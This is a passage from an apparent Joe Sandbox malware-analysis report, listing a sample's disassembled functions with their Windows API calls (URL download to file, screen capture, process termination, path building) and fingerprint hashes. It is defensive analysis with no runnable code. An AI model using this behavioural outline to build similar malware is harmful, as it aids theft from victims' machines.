                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: c1408c9555630e8a44405b158a279ca0d2820695672560340f301dd62b756180
                            • Instruction ID: b777878c57e0e93e6a0a681a856863ff4ea87f04e18c1130837682968badb5b2
                            • Opcode Fuzzy Hash: c1408c9555630e8a44405b158a279ca0d2820695672560340f301dd62b756180
                            • Instruction Fuzzy Hash: 7C51C031A102019FDB21BF79DD49A6F77A5AF88304F05612EFC469B312DB78DC058B99
                            Function 0043A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(00FF9480,00669BD8,0000FFFF), ref: 0043A026
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043A053
                            • lstrlen.KERNEL32(00669BD8), ref: 0043A060
                            • lstrcpy.KERNEL32(00000000,00669BD8), ref: 0043A08A
                            • lstrlen.KERNEL32(00464C4C), ref: 0043A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A0B2
                            • lstrcat.KERNEL32(00000000,00464C4C), ref: 0043A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A114
                            • SetEnvironmentVariableA.KERNEL32(00FF9480,00000000), ref: 0043A12F
                            • LoadLibraryA.KERNEL32(00FE6778), ref: 0043A143
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 6fd04c1c6352ec140c3779c5fddf1a4ddc1ebdaca1ef24cb1860b60580b159b9
                            • Instruction ID: 9db2e6412f9a5ba30cb748657cc3afc15aa4c198d03886b84b9332aee64fccde
                            • Opcode Fuzzy Hash: 6fd04c1c6352ec140c3779c5fddf1a4ddc1ebdaca1ef24cb1860b60580b159b9
                            • Instruction Fuzzy Hash: DB91E1716406009FDB309FB4DC44A6737B6EB58708F50615AE945873A2EFFACC508B9A
                            Function 0044C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044C8A2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044C8D1
                            • lstrlen.KERNEL32(00000000), ref: 0044C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044C932
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 0044C943
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 0c8e4e8cb92466213ef0998c01ef465ee364b2253616222a8e8a1ded5dfd5873
                            • Instruction ID: d905b23ac616e6345837098fdd56b89f02862b0634d0bd472e233f670c8d7872
                            • Opcode Fuzzy Hash: 0c8e4e8cb92466213ef0998c01ef465ee364b2253616222a8e8a1ded5dfd5873
                            • Instruction Fuzzy Hash: 3D61B571E122199BEB50EF758984BAF77B9AF09344F18146BE841E7341D778C9018BA8
                            Function 00454500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0045451A
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00444F39), ref: 00454545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045454C
                            • wsprintfW.USER32 ref: 0045455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004545CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004545D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 004545E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID: 9OD$%hs$9OD
                            • API String ID: 3729781310-2531002427
                            • Opcode ID: bccb0d394fc2e71c7886e1294dfe38ba813805d08b566aa00c0d9597f8dd69d3
                            • Instruction ID: 83d40d3cf2eacdbb4128b30cfe114f85611d6dd8e73ba2421beabe752928b071
                            • Opcode Fuzzy Hash: bccb0d394fc2e71c7886e1294dfe38ba813805d08b566aa00c0d9597f8dd69d3
                            • Instruction Fuzzy Hash: 12318F72A00209BBDB10DBE4DC45FDEB77DAF85705F10015AFA05E7180EBB4AA458BA9
                            Function 004541E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00450CF0), ref: 00454276
                            • GetDesktopWindow.USER32 ref: 00454280
                            • GetWindowRect.USER32(00000000,?), ref: 0045428D
                            • SelectObject.GDI32(00000000,00000000), ref: 004542BF
                            • GetHGlobalFromStream.COMBASE(00450CF0,?), ref: 00454336
                            • GlobalLock.KERNEL32(?), ref: 00454340
                            • GlobalSize.KERNEL32(?), ref: 0045434D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 48b6c18222aa17157911f3f37f38e5cadc0e3b0dd7d7743dadac9eae2904709a
                            • Instruction ID: 396aae9b5df4b24ec072d7c8e8f233db7a4f267743c21ea9c245d22744fbd82b
                            • Opcode Fuzzy Hash: 48b6c18222aa17157911f3f37f38e5cadc0e3b0dd7d7743dadac9eae2904709a
                            • Instruction Fuzzy Hash: BA516E71A10208AFDB10EFB4DD89AEEB7B9EF48304F10511AF905E7250DBB4AD05CBA0
                            Function 0044DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,00FFF2E0), ref: 0044E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E07D
                            • lstrcat.KERNEL32(?,?), ref: 0044E098
                            • lstrcat.KERNEL32(?,?), ref: 0044E0AC
                            • lstrcat.KERNEL32(?,00FEA8A0), ref: 0044E0C0
                            • lstrcat.KERNEL32(?,?), ref: 0044E0D4
                            • lstrcat.KERNEL32(?,00FFE1D0), ref: 0044E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: f5a45c95b4a027db17d4914f22ac6b4a87df03b8869b2020f2b4bb85fc4f9326
                            • Instruction ID: 6aad907e4deaf33740a3a7bc948c96dc68d7dd7ab452b0329e4fa72158262ece
                            • Opcode Fuzzy Hash: f5a45c95b4a027db17d4914f22ac6b4a87df03b8869b2020f2b4bb85fc4f9326
                            • Instruction Fuzzy Hash: 5561BF71A1011CEBDB15EB64CD44ADEB3B9BF4C300F1059AAEA09A3250DFB49F859F94
                            Function 00436AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436AFF
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436B2C
                            • StrCmpCA.SHLWAPI(?,00FFF918), ref: 00436B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00436B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00436B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00436BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00436BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00436BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00436C10
                            • InternetCloseHandle.WININET(00000000), ref: 00436C17
                            • InternetCloseHandle.WININET(?), ref: 00436C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: eddace68c2d1428ecd0d8b597da3146a512a42902bf681b20fdbfbdb202ed77a
                            • Instruction ID: 1d020fe9bb66659b2e70d0913763af72f93426786567a51b7aa7ac1308460f09
                            • Opcode Fuzzy Hash: eddace68c2d1428ecd0d8b597da3146a512a42902bf681b20fdbfbdb202ed77a
                            • Instruction Fuzzy Hash: 364190B1600215BFDB20DF64DC49FAE77B9EB48704F009559FA05E7280DFB4AE008BA8
                            Function 0043BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043BC1F
                            • lstrlen.KERNEL32(00000000), ref: 0043BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043BCAC
                            • lstrlen.KERNEL32(00464AD4), ref: 0043BD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 358509910bd6c8118a24e3fe3ead59dc8cb0f56f28c9803cbf7656a230caf122
                            • Instruction ID: 602f65b4f6357f13255d25eb1f8f6d632b42e1c187d8eb66da149c8d7cb360e0
                            • Opcode Fuzzy Hash: 358509910bd6c8118a24e3fe3ead59dc8cb0f56f28c9803cbf7656a230caf122
                            • Instruction Fuzzy Hash: 6FA16F30A00205CFCB25EF29D949B5EB7B5EF48308F24A06EE90597361DB7ADC41CB98
                            Function 00455EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00456014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 0045609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 004560D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 3956040db99c0fe7a88866a8e3d2f7d37863a0830d11bb86490033734b41cec5
                            • Instruction ID: 92813181ab3a4b8269bd77c718c3552a7c3d7a5123e19eccf6a5616f9bc5d7c6
                            • Opcode Fuzzy Hash: 3956040db99c0fe7a88866a8e3d2f7d37863a0830d11bb86490033734b41cec5
                            • Instruction Fuzzy Hash: B161B271700504EBDB18CF5CC9D096EB3B6EF85706B644A1AE88287382D735ED89CB9D
                            Function 0044E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E07D
                            • lstrcat.KERNEL32(?,?), ref: 0044E098
                            • lstrcat.KERNEL32(?,?), ref: 0044E0AC
                            • lstrcat.KERNEL32(?,00FEA8A0), ref: 0044E0C0
                            • lstrcat.KERNEL32(?,?), ref: 0044E0D4
                            • lstrcat.KERNEL32(?,00FFE1D0), ref: 0044E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
